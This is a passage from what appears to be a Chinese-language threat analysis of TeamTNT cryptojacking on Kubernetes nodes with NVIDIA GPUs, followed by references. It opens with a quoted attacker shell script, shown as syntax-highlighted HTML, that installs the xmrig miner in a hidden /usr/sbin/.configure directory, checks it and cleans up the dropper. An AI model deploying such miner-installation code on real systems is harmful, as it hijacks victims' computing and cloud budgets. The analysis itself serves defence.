style="color:#48484c"><span style="color:#48484c">C </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span> <span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">h </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">CHECK_XMRIG</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">?</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"$CHECK_XMRIG"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!=</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"0"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">]</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig is not functional"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrig"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">else</span></span>
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig was removed"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c">rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f k32r</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">sh </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"[*] Miner /usr/sbin/.configure/xmrig is OK"</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>上面介绍的完整细节突出了 TeamTNT 如何利用 NVIDIA GPU 功能的强大功能来触发加密劫持操作。
推理
攻击者利用 NVIDIA 固有的强大 GPU 功能在受感染的云基础设施上非法挖掘加密货币,并将云成本转嫁给受感染的组织。如前所述,在这次攻击中,TeamTNT没有利用NVIDIA驱动程序中的任何漏洞,而是以未经授权的方式利用它们进行加密挖掘操作。攻击者从受损的云基础设施中获益。这种完全的加密劫持攻击涉及在受感染的云基础设施(在 Kubernetes 集群中托管的节点中运行的 Pod)上秘密安装加密代码,通过执行未经授权的操作来挖掘加密货币。组织面临加密劫持的重大风险,应采取措施避免此类攻击。
引用
[1] 洛根,M.;Fiser, D. TeamTNT 以 Kubernetes 为目标,近 50,000 个 IP 在类似蠕虫的攻击中遭到破坏。趋势科技。2021 年 5 月。TeamTNT Targets Kubernetes, Nearly 50,000 IPs Compromised in Worm-like Attack。
[2] Quist, N. TeamTNT 积极列举云环境以渗透组织。趋势科技。2021 年 6 月。TeamTNT Operations Actively Enumerating Cloud Environments。
[3] Kubernetes 组件。Kubernetes Components | Kubernetes。
[4] 节点。Nodes | Kubernetes。
[5] 容器。Containers | Kubernetes。
[6] 豆荚。Pods | Kubernetes。
[7] 软件包“nvidia-headless-450-server”。Ubuntu 更新。UbuntuUpdates - Package "nvidia-headless-450-server" (focal 20.04)。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
